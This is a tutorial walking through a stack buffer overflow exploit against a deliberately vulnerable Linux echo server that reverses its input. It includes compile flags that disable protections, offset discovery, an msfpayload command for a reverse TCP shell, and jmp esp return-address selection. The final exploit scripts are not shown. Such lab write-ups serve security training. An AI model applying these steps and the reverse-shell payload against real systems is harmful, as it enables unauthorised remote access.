EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application software is namely vuln-server which you can download here.







Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.



Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.



I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.



gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb



Run the vuln-server :



./vuln-server 5700



Open another terminal to run the client :



nc -vv 127.0.0.1 5700

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!

Type QUIT on a line by itself to quit



Enter something on the client, for example :



Connection to 127.0.0.1 5700 port[tcp/*] succeeded!

Type QUIT on a line by itself to quit

hello world

dlrow olleh



You will find out that the message you entered is echo back in reverse order.



The server side will display :



127.0.0.1:41959 hello world



Now, write a python script to send 500 bytes of data to the echo server.







Run it and you will find out that the EIP register is overwritten by A's.



Go to create a 500 unique characters to overwrite the EIP.



./pattern_create.rb 500



Copy the result to the captioned python script and replace the junk with the pattern.



Run the python the modified python script again and you will find out that the EIP is overwritten with 0x416c3341.



Reverse the address and find the offset with the following command :



./pattern_offset.rb 0x41336c41 500

[*] Exact match at offset 339



So, the offset is 339.



Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.



msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper



However, we need to reverse the shellcode with the following python script.



shellcode = "blah blah ...."

shellcode = shellcode[::-1]

shellcode.encode("hex")

print shellcode



Then, add back the "\x" to the shellcode on every two characters.



Okay, it is high time to find the return address.



msfelfscan -j esp vuln-server

[vuln-server]

0x08064e49 push esp; ret

0x08064ea7 push esp; ret

0x08065f71 push esp; ret

0x08081949 push esp; ret

0x08085df9 push esp; retn 0x8934

0x080a56e9 push esp; ret

0x080c37ab jmp esp

0x080c388f jmp esp

0x080c38b7 jmp esp

0x080c3c3f jmp esp

0x080c3d17 jmp esp

0x080c3da7 jmp esp

0x080c3db3 jmp esp

0x080c3dd3 jmp esp

0x080c532b jmp esp <----- selected this one



I select the last one as the return address.



As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :







Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.







Therefore, never run any program with root.



That's all! See you.